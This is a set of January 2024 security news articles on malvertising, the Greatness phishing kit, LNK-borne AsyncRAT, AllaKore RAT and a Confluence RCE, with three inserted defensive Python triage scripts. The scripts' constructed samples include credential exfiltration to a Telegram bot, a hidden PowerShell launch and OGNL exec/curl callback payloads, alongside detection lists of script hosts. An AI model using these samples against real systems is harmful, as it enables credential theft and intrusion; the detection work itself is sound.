Malicious Ads on Google Target Chinese Users with Fake Messaging Apps

Jan 26, 2024 | Newsroom | Malvertising / Phishing-as-a-service

Chinese-speaking users have been targeted by malicious Google ads for restricted messaging apps like Telegram as part of an ongoing malvertising campaign.

“The threat actor is abusing Google advertiser accounts to create malicious ads and pointing them to pages where unsuspecting users will download Remote Administration Trojans (RATs) instead,” Malwarebytes’ Jérôme Segura said in a Thursday report. “Such programs give an attacker full control of a victim’s machine and the ability to drop additional malware.”

It’s worth noting that the activity, codenamed FakeAPP, is a continuation of a prior attack wave that targeted Hong Kong users searching for messaging apps like WhatsApp and Telegram on search engines in late October 2023.

The latest iteration also adds LINE to the list of impersonated messaging apps, and redirects users to bogus download pages hosted on Google Docs or Google Sites.

Hosting the lure pages on Google’s own infrastructure lets the threat actor embed links to sites under their control, which serve the malicious installer files that ultimately deploy trojans such as PlugX and Gh0st RAT. Because the first hop is a legitimate Google domain, reputation-based URL filtering alone will not flag the ad’s landing page.

Malwarebytes said it traced the fraudulent ads to two advertiser accounts named Interactive Communication Team Limited and Ringier Media Nigeria Limited that are based in Nigeria.

“It also appears that the threat actor privileges quantity over quality by constantly pushing new payloads and infrastructure as command-and-control,” Segura said.

The development comes as Trustwave SpiderLabs disclosed a spike in the use of a phishing-as-a-service (PhaaS) platform called Greatness to create legitimate-looking credential harvesting pages targeting Microsoft 365 users.

“The kit allows for personalizing sender names, email addresses, subjects, messages, attachments, and QR codes, enhancing relevance and engagement,” the company said, adding that it comes with anti-detection measures such as randomized headers, encoding, and obfuscation that aim to bypass spam filters and security systems.

Greatness is offered for sale to other criminal actors for $120 per month, effectively lowering the barrier to entry and helping them conduct attacks at scale.

Attack chains entail sending phishing emails bearing malicious HTML attachments that, when opened by the recipients, direct them to a fake login page that captures the login credentials entered and exfiltrates the details to the threat actor via Telegram.

Other infection sequences have leveraged the attachments to drop malware on the victim’s machine to facilitate information theft.
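The attachment chain described above, as an added example that is not Trustwave’s code or anything from the Greatness kit itself: a small triage script that opens a raw e-mail, pulls out its HTML attachments, decodes any base64 layers the page smuggles in, and looks for the two things that define this chain, a password form and a post to Telegram’s Bot API. The indicator patterns and the sample message are constructed for illustration (assumptions), not signatures from the report.

```python
"""Triage e-mail HTML attachments for a Greatness-style credential harvester:
an HTML file that renders (often after base64 unpacking) a login form and
ships the captured values to Telegram's Bot API. Added example; the sample
message is constructed, not a real phishing sample."""
import base64
import email
import email.policy
import re
from email.message import EmailMessage

# Indicator patterns. Illustrative (assumption): extend them from samples in
# your own environment.
TELEGRAM_BOT_API = re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/", re.I)
PASSWORD_FIELD = re.compile(r"<input[^>]+type=[\"']?password", re.I)
SMUGGLING_API = re.compile(r"\batob\(|\bunescape\(|document\.write\(|new Blob\(|createObjectURL\(")
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def unpack_layers(html: str, max_depth: int = 3) -> str:
    """Return the HTML plus every base64 payload it embeds, decoded layer by
    layer, so indicators match what the browser will actually run and not
    just the outer wrapper."""
    collected = html
    layer = html
    for _ in range(max_depth):
        decoded = []
        for blob in BASE64_BLOB.findall(layer):
            try:
                decoded.append(base64.b64decode(blob).decode("utf-8", errors="ignore"))
            except ValueError:  # binascii.Error: not valid base64 after all
                continue
        if not decoded:
            break
        layer = "\n".join(decoded)
        collected += "\n" + layer
    return collected


def score_html(html: str) -> dict:
    """A password form whose data goes to a Telegram bot is the harvesting
    signature; smuggling APIs or a lone form only raise suspicion."""
    content = unpack_layers(html)
    findings = {
        "password_form": bool(PASSWORD_FIELD.search(content)),
        "telegram_exfil": bool(TELEGRAM_BOT_API.search(content)),
        "smuggling_api": bool(SMUGGLING_API.search(content)),
    }
    if findings["password_form"] and findings["telegram_exfil"]:
        findings["verdict"] = "phish"
    elif any(findings.values()):
        findings["verdict"] = "suspicious"
    else:
        findings["verdict"] = "clean"
    return findings


def triage_message(raw: bytes) -> list:
    """Scan every HTML attachment of a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    results = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html" or name.lower().endswith((".html", ".htm"))
        if not is_html:
            continue
        body = part.get_payload(decode=True).decode("utf-8", errors="ignore")
        results.append({"filename": name, "subject": msg["subject"], **score_html(body)})
    return results


def build_sample_eml() -> bytes:
    """Constructed sample: an 'urgent invoice' lure whose HTML attachment
    hides the real page (login form + Telegram exfil) in base64 and writes it
    into the DOM when opened."""
    inner_page = (
        '<form id="login"><input name="user"><input type="password" name="pass"></form>'
        '<script>document.forms[0].onsubmit=function(){fetch("https://api.telegram.org/'
        'bot123456:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sendMessage?chat_id=1&text="'
        '+encodeURIComponent(this.user.value+":"+this.pass.value));return false;};</script>'
    )
    blob = base64.b64encode(inner_page.encode()).decode()
    outer = f'<html><body><script>document.write(atob("{blob}"));</script></body></html>'
    msg = EmailMessage()
    msg["From"] = "billing@example.com"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Urgent invoice payment"
    msg.set_content("Please review the attached invoice.")
    msg.add_attachment(outer, subtype="html", filename="invoice.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for hit in triage_message(build_sample_eml()):
        print(hit)
```

The unpacking step matters more than the pattern list: a gateway that only inspects the outer HTML sees a harmless `document.write` wrapper, while the form and the exfiltration URL live one base64 layer down.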

To increase the likelihood of success of the attack, the email messages spoof trusted sources like banks and employers and induce a false sense of urgency using subjects like “urgent invoice payments” or “urgent account verification required.”

“The number of victims is unknown at this time, but Greatness is widely used and well-supported, with its own Telegram community providing information on how to operate the kit, along with additional tips and tricks,” Trustwave said.

Phishing attacks have also been observed striking South Korean companies using lures that impersonate tech companies like Kakao to distribute AsyncRAT via malicious Windows shortcut (LNK) files.

“Malicious shortcut files disguised as legitimate documents are continuously being distributed,” the AhnLab Security Intelligence Center (ASEC) said. “Users can mistake the shortcut file for a normal document, as the ‘.LNK’ extension is not visible on the names of the files.”
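Because Explorer never shows the `.LNK` suffix, a file named `Notice.pdf.lnk` is displayed as `Notice.pdf`, so name-based checks are the wrong tool. The following added example (not code from ASEC or the campaign) identifies a shortcut by its on-disk header from MS-SHLLINK, skips the optional ID-list and link-info blocks, decodes the string fields that hold the launched path and arguments, and flags shortcuts that pose as documents or start a script host. The sample shortcut is built by the script itself and the host list is an illustrative assumption.

```python
"""Identify Windows shortcut (.LNK) files by header rather than by name and
recover the command they launch. Added example; the sample shortcut is
constructed from the MS-SHLLINK header and StringData layout."""
import struct
import uuid

HEADER_SIZE = 0x4C
LINK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")

# LinkFlags bits that decide which optional structures follow the header
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# Script hosts and LOLBins a document-looking shortcut should never launch.
# Illustrative list (assumption): tune it to your environment.
SUSPICIOUS_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript",
                    "cscript", "rundll32", "certutil", "bitsadmin")
DOCUMENT_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".hwp", ".txt")


def is_shell_link(data: bytes) -> bool:
    """A Shell Link starts with HeaderSize 0x4C followed by the fixed LinkCLSID."""
    if len(data) < HEADER_SIZE:
        return False
    header_size = struct.unpack_from("<I", data, 0)[0]
    return header_size == HEADER_SIZE and uuid.UUID(bytes_le=data[4:20]) == LINK_CLSID


def parse_shell_link(data: bytes) -> dict:
    """Skip LinkTargetIDList and LinkInfo if present, then decode the StringData
    fields in their fixed order (name, relative path, working dir, arguments, icon)."""
    if not is_shell_link(data):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]   # IDListSize excludes itself
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]       # LinkInfoSize covers the block
    fields = {"flags": flags}
    for name, bit in (("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                      ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                      ("icon_location", HAS_ICON_LOCATION)):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]       # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", errors="replace")
            pos += count
    return fields


def triage_shortcut(filename: str, data: bytes) -> dict:
    """Flag a shortcut that poses as a document or launches a script host."""
    info = parse_shell_link(data)
    command = " ".join(info.get(k, "") for k in ("relative_path", "arguments")).strip().lower()
    lower = filename.lower()
    displayed = lower[:-4] if lower.endswith(".lnk") else lower  # what Explorer shows
    reasons = []
    if not lower.endswith(".lnk"):
        reasons.append("Shell Link content under a non-.lnk name")
    if displayed.endswith(DOCUMENT_EXTENSIONS):
        reasons.append(f"displayed name looks like a document: {displayed}")
    hosts = [h for h in SUSPICIOUS_HOSTS if h in command]
    if hosts:
        reasons.append("launches " + ", ".join(hosts))
    return {"command": command, "reasons": reasons, "suspicious": bool(reasons)}


def build_sample_shortcut(relative_path: str, arguments: str) -> bytes:
    """Constructed .LNK carrying only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS,
    which is enough for Windows to resolve and run the target."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    # HeaderSize, LinkCLSID, LinkFlags, FileAttributes(ARCHIVE), 3 timestamps,
    # FileSize, IconIndex, ShowCommand(SW_SHOWNORMAL), HotKey, Reserved1..3
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID.bytes_le, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


if __name__ == "__main__":
    sample = build_sample_shortcut(
        r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"-w hidden -nop -ep bypass -f C:\Users\Public\stage.ps1")
    print(triage_shortcut("Kakao_Notice.pdf.lnk", sample))
```

Real-world shortcuts usually carry a LinkTargetIDList and LinkInfo block before the strings; the parser only needs their sizes to step past them, which is why the launched command can be recovered without interpreting the ID list at all.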

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.


AllaKore RAT Malware Targeting Mexican Firms with Financial Fraud Tricks

Jan 27, 2024 | Newsroom | Malware / Software Update

Large Mexican companies are in the crosshairs of a new spear-phishing campaign that delivers a modified version of the open-source remote access trojan AllaKore RAT in order to commit financial fraud against them.

The BlackBerry Research and Intelligence Team attributed the activity to an unknown Latin American-based financially motivated threat actor. The campaign has been active since at least 2021.

“Lures use Mexican Social Security Institute (IMSS) naming schemas and links to legitimate, benign documents during the installation process,” the Canadian company said in an analysis published earlier this week.

“The AllaKore RAT payload is heavily modified to allow the threat actors to send stolen banking credentials and unique authentication information back to a command-and-control (C2) server for the purposes of financial fraud.”

The attacks appear to be designed to particularly single out large companies with gross revenues over $100 million. Targeted entities span retail, agriculture, public sector, manufacturing, transportation, commercial services, capital goods, and banking sectors.

The infection chain begins with a ZIP file that’s either distributed via phishing or a drive-by compromise, which contains an MSI installer file that drops a .NET downloader responsible for confirming the Mexican geolocation of the victim and retrieving the altered AllaKore RAT, a Delphi-based RAT first observed in 2015.

“AllaKore RAT, although somewhat basic, has the potent capability to keylog, screen capture, upload/download files, and even take remote control of the victim’s machine,” BlackBerry said.

The new functions added to the malware by the threat actor include support for commands related to banking fraud, targeting Mexican banks and crypto trading platforms, launching a reverse shell, extracting clipboard content, and fetching and executing additional payloads.

The threat actor’s links to Latin America come from the use of Mexican Starlink IP addresses in the campaign, as well as the Spanish-language instructions added to the modified RAT payload. Furthermore, the lures employed only work for companies that are large enough to report directly to the Mexican Social Security Institute (IMSS).

“This threat actor has been persistently targeting Mexican entities for the purposes of financial gain,” the company said. “This activity has continued for over two years, and shows no signs of stopping.”

The findings come as IOActive said it identified three vulnerabilities in the Lamassu Douro bitcoin ATMs (CVE-2024-0175, CVE-2024-0176, and CVE-2024-0177) that could allow an attacker with physical access to take full control of the devices and steal user assets.

The attacks are made possible by abusing the ATM’s software update mechanism together with its ability to read QR codes, which lets an attacker supply a malicious update file and trigger the execution of arbitrary code. The issues were fixed by the Swiss company in October 2023.


Perfecting the Defense-in-Depth Strategy with Automation


Medieval castles stood as impregnable fortresses for centuries, thanks to their meticulous design. Fast forward to the digital age, and this medieval wisdom still echoes in cybersecurity. Like castles with strategic layouts to withstand attacks, the Defense-in-Depth strategy is the modern counterpart — a multi-layered approach with strategic redundancy and a blend of passive and active security controls.

However, the evolving cyber threat landscape can challenge even the most fortified defenses. Despite the widespread adoption of the Defense-in-Depth strategy, cyber threats persist. Fortunately, the Defense-in-Depth strategy can be augmented using Breach and Attack Simulation (BAS), an automated tool that assesses and improves every security control in each layer.

Defense-in-Depth: False Sense of Security with Layers

Also known as multi-layered defense, the defense-in-depth strategy has been widely adopted by organizations since the early 2000s. It’s based on the assumption that adversaries must breach multiple defense layers to compromise valuable assets. Since no singular security control can provide foolproof protection against the wide array of cyber threats, defense-in-depth has become the norm for organizations worldwide. But if every organization uses this strategy today, why are security breaches still so common?

Ultimately, the primary reason is a false sense of security from the assumption that layered solutions will always function as intended. However, organizations shouldn’t put all their faith in multi-layered defenses — they must also stay up-to-date against new attack vectors, possible configuration drifts, and the complex nature of managing security controls. In the face of evolving cyber threats, unsubstantiated trust in defensive layers is a security breach waiting to happen.

Perfecting the Defense-in-Depth Strategy

The defense-in-depth strategy promotes using multiple security controls at different layers to prevent and detect cyber threats. Many organizations model these layers around four fundamental layers: Network, Host, Application, and Data Layers. Security controls are configured for one or more layers to maintain a robust security posture. Typically, organizations use IPS and NGFW solutions at the Network Layer, EDR and AV solutions at the Host Layer, WAF solutions at the Application Layer, DLP solutions at the Data Layer, and SIEM solutions across multiple layers.

Although this general approach applies to nearly all defense-in-depth implementations, security teams cannot simply deploy security solutions and forget about them. In fact, according to the Blue Report 2023 by Picus, 41% of cyber attacks bypass network security controls. Today, an effective security strategy requires a solid understanding of the threat landscape and regularly testing security controls against real cyber threats.

Harnessing the Power of Automation: Introducing BAS into the Defense-in-Depth Strategy

Understanding an organization’s threat landscape can be challenging due to the vast number of cyber threats. Security teams must sift through hundreds of threat intelligence reports daily and decide whether each threat might target their organization. On top of that, they need to test their security controls against these threats to assess the performance of their defense-in-depth strategy. Even if organizations could manually analyze each intelligence report and run a traditional assessment (such as penetration testing and red teaming), it would take far too much time and too many resources. Long story short, today’s cyber threat landscape is impossible to navigate without automation.

When it comes to security control testing and automation, one particular tool stands out among the rest: Breach and Attack Simulation (BAS). Since its first appearance in Gartner’s Hype Cycle for Threat-Facing Technologies in 2017, BAS has become a valuable part of security operations for many organizations. A mature BAS solution provides automated threat intelligence and threat simulation for security teams to assess their security controls. When BAS solutions are integrated with the defense-in-depth strategy, security teams can proactively identify and mitigate potential security gaps before malicious actors can exploit them. BAS works with multiple security controls across the network, host, application, and data layers, allowing organizations to assess their security posture holistically.

LLM-Powered Cyber Threat Intelligence

When introducing automation into the defense-in-depth strategy, the first step is to automate the cyber threat intelligence (CTI) process. Operationalizing hundreds of threat intelligence reports can be automated using large language models (LLMs) such as ChatGPT, Bard, and LLaMA. Modern BAS tools can even provide their own LLM-powered CTI and integrate with external CTI providers to analyze and track the organization’s threat landscape.

Simulating Attacks in the Network Layer

As a fundamental line of defense, the network layer is often tested by adversaries with infiltration attempts. This layer’s security is measured by its ability to identify and block malicious traffic. BAS solutions simulate malicious infiltration attempts observed ‘in the wild’ and validate the network layer’s security posture against real-life cyber attacks.

Assessing the Security Posture of the Host Layer

Individual devices such as servers, workstations, desktops, laptops, and other endpoints make up a significant portion of the devices in the host layer. These devices are often targeted with malware, vulnerability exploitation, and lateral movement attacks. BAS tools can assess the security posture of each device and test the effectiveness of host layer security controls.

Exposure Assessment in the Application Layer

Public-facing applications, like websites and email services, are often the most critical yet most exposed parts of an organization’s infrastructure. There are countless examples of cyber attacks initiated by bypassing a WAF or a benign-looking phishing email. Advanced BAS platforms can mimic adversary actions to ensure security controls in the application are working as intended.

Protecting Data Against Ransomware and Exfiltration

The rise of ransomware and data exfiltration attacks is a stark reminder that organizations must protect their proprietary and customer data. Security controls such as DLPs and access controls in the data layer secure sensitive information. BAS solutions can replicate adversarial techniques to rigorously test these protection mechanisms.

Continuous Validation of the Defense-in-Depth Strategy with BAS

As the threat landscape evolves, so should an organization’s security strategy. BAS provides a continuous and proactive approach for organizations to assess every layer of their defense-in-depth approach. With resilience demonstrated against real-life cyber threats, security teams can base their confidence in their security controls on evidence rather than on the assumption that the layers work as intended.

Picus Security pioneered Breach and Attack Simulation (BAS) technology in 2013 and has helped organizations improve their cyber resilience ever since. With Picus Security Validation Platform, your organization can supercharge its existing security controls against even the most sophisticated cyberattacks. Visit picussecurity.com to book a demo or explore our resources like “How Breach and Attack Simulation Fits Into a Multi-layered Defense Strategy” whitepaper.

To grow your understanding of evolving cyber threats, explore the Top 10 MITRE ATT&CK techniques and refine your defense-in-depth strategy. Download the Picus Red Report today.

Note: This article was written by Huseyin Can Yuceel, Security Research Lead at Picus Security, where simulating cyber threats and empowering defenses are our passions.


Critical Confluence RCE Under Active Exploitation

Jan 23, 2024 | Newsroom | Vulnerability / Cyber Attack

Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server, within three days of public disclosure.

Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers to achieve remote code execution on susceptible installations.

The shortcoming affects Confluence Data Center and Server 8 versions released before December 5, 2023, as well as 8.4.5.

But merely days after the flaw became public knowledge, nearly 40,000 exploitation attempts targeting CVE-2023-22527 have been recorded in the wild as early as January 19 from more than 600 unique IP addresses, according to both the Shadowserver Foundation and the DFIR Report.

The activity is currently limited to “testing callback attempts and ‘whoami’ execution,” suggesting that threat actors are opportunistically scanning for vulnerable servers for follow-on exploitation.

A majority of the attacker IP addresses are from Russia (22,674), followed by Singapore, Hong Kong, the U.S., China, India, Brazil, Taiwan, Japan, and Ecuador.

Over 11,000 Atlassian instances have been found to be accessible over the internet as of January 21, 2024, although it’s currently not known how many of them are vulnerable to CVE-2023-22527.

“CVE-2023-22527 is a critical vulnerability within Atlassian’s Confluence Server and Data Center,” ProjectDiscovery researchers Rahul Maini and Harsh Jaiswal said in a technical analysis of the flaw.

“This vulnerability has the potential to permit unauthenticated attackers to inject OGNL expressions into the Confluence instance, thereby enabling the execution of arbitrary code and system commands.”
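The scanning described above, as an added example that is not from Shadowserver, the DFIR Report or ProjectDiscovery: a triage script that walks request logs, undoes the URL and `\uXXXX` encodings attackers layer on OGNL payloads, flags requests that carry OGNL expression markers, sorts them into the two stages the reports mention (a `whoami` check and a callback test), and counts attempts per source IP the way Shadowserver’s figures are reported. The log lines are constructed and the payloads simplified stand-ins, not the real exploit request; they represent a reverse-proxy or WAF log that records POST bodies, since a stock access log would not show them. The marker list is an illustrative assumption.

```python
"""Triage request logs for OGNL-injection probing against Confluence.
Added example. The log lines are constructed and the payloads simplified;
they stand in for a reverse-proxy/WAF log that records request bodies."""
import re
from collections import Counter, defaultdict
from typing import Optional
from urllib.parse import unquote_plus

# Substrings that betray an OGNL expression aimed at the JVM. Illustrative
# set (assumption): extend it from your own samples and vendor guidance.
OGNL_MARKERS = (
    "@java.lang.runtime@", "getruntime(", ".exec(", "processbuilder",
    "#request", "#application", "#parameters", "@org.apache.", "findvalue(",
)
CALLBACK = re.compile(r"https?://[\w.-]+(?::\d+)?|\b\d{1,3}(?:\.\d{1,3}){3}:\d{2,5}\b")
UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def normalize(text: str) -> str:
    """Peel off the encodings stacked on a payload: URL encoding (applied twice
    to catch double-encoded variants) and \\uXXXX escapes used to hide quotes
    and '#' from naive filters. Case-folded for matching."""
    text = unquote_plus(unquote_plus(text))
    text = UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return text.lower()


def classify(path: str, body: str) -> Optional[dict]:
    """Return None for benign traffic, otherwise the probe's stage and markers."""
    text = normalize(path + " " + body)
    markers = [m for m in OGNL_MARKERS if m in text]
    if not markers:
        return None
    if "whoami" in text:
        stage = "recon (whoami)"
    elif CALLBACK.search(text):
        stage = "callback test"
    else:
        stage = "ognl probe"
    return {"stage": stage, "markers": markers}


def triage(lines) -> dict:
    """Each line: client_ip, method, path, body separated by tabs.
    Aggregates hits per source IP and per stage."""
    events, per_ip = [], Counter()
    stages = defaultdict(Counter)
    for line in lines:
        client_ip, method, path, body = line.rstrip("\n").split("\t", 3)
        verdict = classify(path, body)
        if verdict is None:
            continue
        per_ip[client_ip] += 1
        stages[client_ip][verdict["stage"]] += 1
        events.append({"ip": client_ip, "method": method, "path": path, **verdict})
    return {"events": events, "per_ip": per_ip, "stages": stages}


# Constructed sample log: simplified stand-ins, not the real exploit request.
SAMPLE_LOG = [
    "203.0.113.10\tPOST\t/some.action\tq=%40java.lang.Runtime%40getRuntime%28%29.exec%28%27whoami%27%29",
    "203.0.113.10\tPOST\t/some.action\tq=%5Cu0027%2B%23request%5B%5Cu0027x%5Cu0027%5D%2B%5Cu0027",
    "198.51.100.7\tGET\t/some.action?q=%40java.lang.Runtime%40getRuntime%28%29.exec%28%27curl+http%3A%2F%2F192.0.2.5%3A8080%2Fx%27%29\t",
    "192.0.2.20\tGET\t/pages/viewpage.action?pageId=123\t",
]

if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    for event in report["events"]:
        print(event)
    print(dict(report["per_ip"]))
```

The second sample line is the case worth noticing: with `\u0027` standing in for the quote and the `#` URL-encoded, a filter that only URL-decodes once and looks for a literal `'` never sees an expression, while the normalization step reduces it to `'+#request['x']+'` before matching.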


Apple Issues Patch for Critical Zero-Day in iPhones, Macs

Jan 23, 2024 | Newsroom | Vulnerability / Device Security

Apple on Monday released security updates for iOS, iPadOS, macOS, tvOS, and Safari web browser to address a zero-day flaw that has come under active exploitation in the wild.

The issue, tracked as CVE-2024-23222, is a type confusion bug that could be exploited by a threat actor to achieve arbitrary code execution when processing maliciously crafted web content. The tech giant said the problem was fixed with improved checks.

Type confusion vulnerabilities, in general, could be weaponized to perform out-of-bounds memory access, or lead to a crash and arbitrary code execution.

Apple, in a terse advisory, acknowledged that it’s “aware of a report that this issue may have been exploited,” but did not share any other specifics about the nature of attacks or the threat actors leveraging the shortcoming.

The updates are available for the following devices and operating systems –

  • iOS 17.3 and iPadOS 17.3 – iPhone XS and later, iPad Pro 12.9-inch 2nd generation and later, iPad Pro 10.5-inch, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 6th generation and later, and iPad mini 5th generation and later
  • iOS 16.7.5 and iPadOS 16.7.5 – iPhone 8, iPhone 8 Plus, iPhone X, iPad 5th generation, iPad Pro 9.7-inch, and iPad Pro 12.9-inch 1st generation
  • macOS Sonoma 14.3 – Macs running macOS Sonoma
  • macOS Ventura 13.6.4 – Macs running macOS Ventura
  • macOS Monterey 12.7.3 – Macs running macOS Monterey
  • tvOS 17.3 – Apple TV HD and Apple TV 4K (all models)
  • Safari 17.3 – Macs running macOS Monterey and macOS Ventura

The development marks the first actively exploited zero-day vulnerability to be patched by Apple this year. Last year, the iPhone maker addressed 20 zero-days that were employed in real-world attacks.

In addition, Apple has also backported fixes for CVE-2023-42916 and CVE-2023-42917 – patches for which were released in December 2023 – to older devices –

  • iOS 15.8.1 and iPadOS 15.8.1 – iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

The disclosure also follows a report that Chinese authorities revealed that they have used previously known vulnerabilities in Apple’s AirDrop functionality to help law enforcement to identify senders of inappropriate content, using a technique based on rainbow tables.
